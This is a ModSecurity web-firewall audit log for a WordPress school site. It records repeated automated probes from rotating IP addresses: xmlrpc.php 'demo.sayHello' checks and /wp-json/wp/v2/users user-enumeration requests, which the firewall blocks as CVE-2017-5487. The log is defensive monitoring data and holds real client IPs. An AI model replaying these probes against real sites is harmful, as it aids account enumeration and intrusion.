Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0d292c14-Z-- --4233cc43-A-- [17/May/2025:02:50:30 +0700] aCeXBthEtho3ciA0weheFAAAAI0 103.236.140.4 54332 103.236.140.4 8181 --4233cc43-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.193.81 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.193.81 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --4233cc43-C-- demo.sayHello --4233cc43-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --4233cc43-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747425030597507 4760 (- - -) Stopwatch2: 1747425030597507 4760; combined=3659, p1=407, p2=3038, p3=28, p4=25, p5=93, sr=65, sw=68, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4233cc43-Z-- --9516b24c-A-- [17/May/2025:02:50:32 +0700] aCeXCNhEtho3ciA0weheFQAAAJQ 103.236.140.4 54334 103.236.140.4 8181 --9516b24c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.112.235 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.112.235 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --9516b24c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9516b24c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747425032896246 2122 (- - -) Stopwatch2: 1747425032896246 2122; combined=1006, p1=336, p2=639, p3=0, p4=0, p5=31, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9516b24c-Z-- --c0d38615-A-- [17/May/2025:02:50:36 +0700] aCeXDNhEtho3ciA0weheGQAAAIA 103.236.140.4 54342 103.236.140.4 8181 --c0d38615-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.107.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.107.90 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --c0d38615-C-- demo.sayHello --c0d38615-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --c0d38615-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747425036504197 4727 (- - -) Stopwatch2: 1747425036504197 4727; combined=3648, p1=421, p2=3017, p3=25, p4=23, p5=94, sr=66, sw=68, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c0d38615-Z-- --78011604-A-- [17/May/2025:02:50:37 +0700] aCeXDdhEtho3ciA0weheGgAAAIU 103.236.140.4 54344 103.236.140.4 8181 --78011604-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.112.235 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.112.235 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --78011604-C-- demo.sayHello --78011604-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --78011604-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747425037950659 4508 (- - -) Stopwatch2: 1747425037950659 4508; combined=3591, p1=413, p2=2978, p3=24, p4=26, p5=89, sr=71, sw=61, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --78011604-Z-- --2a78be6c-A-- [17/May/2025:02:50:50 +0700] aCeXGthEtho3ciA0weheHQAAAIc 103.236.140.4 54350 103.236.140.4 8181 --2a78be6c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 45.202.79.28 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.202.79.28 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --2a78be6c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2a78be6c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747425050372549 2816 (- - -) Stopwatch2: 1747425050372549 2816; combined=1319, p1=431, p2=857, p3=0, p4=0, p5=31, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2a78be6c-Z-- --c3f15d68-A-- [17/May/2025:02:50:55 +0700] aCeXH9hEtho3ciA0weheHwAAAJA 103.236.140.4 54354 103.236.140.4 8181 --c3f15d68-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 45.202.79.28 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.202.79.28 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --c3f15d68-C-- demo.sayHello --c3f15d68-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --c3f15d68-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747425055312911 4772 (- - -) Stopwatch2: 1747425055312911 4772; combined=3709, p1=455, p2=3056, p3=24, p4=25, p5=88, sr=68, sw=61, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c3f15d68-Z-- --23ccb706-A-- [17/May/2025:02:50:59 +0700] aCeXI9hEtho3ciA0weheIQAAAIg 103.236.140.4 54358 103.236.140.4 8181 --23ccb706-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.82.197 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.82.197 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --23ccb706-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --23ccb706-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747425059928212 2119 (- - -) Stopwatch2: 1747425059928212 2119; combined=1051, p1=331, p2=693, p3=0, p4=0, p5=26, sr=68, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --23ccb706-Z-- --18d9d068-A-- [17/May/2025:02:51:07 +0700] aCeXK9e6THFz1hsaJaLZHgAAAAg 103.236.140.4 54368 103.236.140.4 8181 --18d9d068-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.82.197 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.82.197 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --18d9d068-C-- demo.sayHello --18d9d068-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --18d9d068-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747425067457401 5772 (- - -) Stopwatch2: 1747425067457401 5772; combined=4279, p1=555, p2=3498, p3=32, p4=37, p5=93, sr=74, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --18d9d068-Z-- --61ccdc11-A-- [17/May/2025:02:51:18 +0700] aCeXNte6THFz1hsaJaLZIAAAAAU 103.236.140.4 54372 103.236.140.4 8181 --61ccdc11-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.107.38 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.107.38 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --61ccdc11-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --61ccdc11-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747425078333356 2717 (- - -) Stopwatch2: 1747425078333356 2717; combined=1236, p1=413, p2=793, p3=0, p4=0, p5=29, sr=76, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --61ccdc11-Z-- --6b1fa56c-A-- [17/May/2025:02:51:24 +0700] aCeXPNe6THFz1hsaJaLZJAAAAAk 103.236.140.4 54380 103.236.140.4 8181 --6b1fa56c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.107.38 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.107.38 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --6b1fa56c-C-- demo.sayHello --6b1fa56c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --6b1fa56c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747425084304955 4601 (- - -) Stopwatch2: 1747425084304955 4601; combined=3639, p1=455, p2=2985, p3=23, p4=23, p5=90, sr=67, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6b1fa56c-Z-- --c095316e-A-- [17/May/2025:02:51:47 +0700] aCeXU9e6THFz1hsaJaLZJQAAAAQ 103.236.140.4 54384 103.236.140.4 8181 --c095316e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.248.87.240 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.87.240 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --c095316e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c095316e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747425107946568 2776 (- - -) Stopwatch2: 1747425107946568 2776; combined=1270, p1=431, p2=809, p3=0, p4=0, p5=30, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c095316e-Z-- --dc649f43-A-- [17/May/2025:02:51:50 +0700] aCeXVte6THFz1hsaJaLZJwAAAAc 103.236.140.4 54388 103.236.140.4 8181 --dc649f43-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.248.87.240 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.87.240 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --dc649f43-C-- demo.sayHello --dc649f43-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --dc649f43-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747425110984950 5802 (- - -) Stopwatch2: 1747425110984950 5802; combined=4238, p1=583, p2=3370, p3=29, p4=87, p5=98, sr=107, sw=71, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dc649f43-Z-- --fa7ff965-A-- [17/May/2025:02:52:11 +0700] aCeXa8e47ocjCGWTS4Y_BQAAAEo 103.236.140.4 54392 103.236.140.4 8181 --fa7ff965-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.83.37 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.83.37 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --fa7ff965-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fa7ff965-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747425131932144 3384 (- - -) Stopwatch2: 1747425131932144 3384; combined=1448, p1=484, p2=930, p3=0, p4=0, p5=34, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fa7ff965-Z-- --cc2add74-A-- [17/May/2025:02:52:18 +0700] aCeXcte6THFz1hsaJaLZKQAAABQ 103.236.140.4 54396 103.236.140.4 8181 --cc2add74-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.83.37 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.83.37 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --cc2add74-C-- demo.sayHello --cc2add74-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --cc2add74-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747425138497772 4848 (- - -) Stopwatch2: 1747425138497772 4848; combined=3831, p1=477, p2=3034, p3=29, p4=26, p5=146, sr=69, sw=119, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cc2add74-Z-- --5d60ba2f-A-- [17/May/2025:02:52:32 +0700] aCeXgMe47ocjCGWTS4Y_BwAAAEY 103.236.140.4 54400 103.236.140.4 8181 --5d60ba2f-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.94.150 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.94.150 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --5d60ba2f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5d60ba2f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747425152898725 2805 (- - -) Stopwatch2: 1747425152898725 2805; combined=1259, p1=424, p2=805, p3=0, p4=0, p5=30, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5d60ba2f-Z-- --f3b0b318-A-- [17/May/2025:02:52:40 +0700] aCeXiNe6THFz1hsaJaLZKwAAABE 103.236.140.4 54404 103.236.140.4 8181 --f3b0b318-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.33.53 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.33.53 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --f3b0b318-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f3b0b318-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747425160377354 3320 (- - -) Stopwatch2: 1747425160377354 3320; combined=1384, p1=487, p2=864, p3=0, p4=0, p5=33, sr=83, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f3b0b318-Z-- --7cda8641-A-- [17/May/2025:02:52:40 +0700] aCeXiMe47ocjCGWTS4Y_CQAAAFA 103.236.140.4 54406 103.236.140.4 8181 --7cda8641-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.94.150 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.94.150 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --7cda8641-C-- demo.sayHello --7cda8641-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --7cda8641-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s 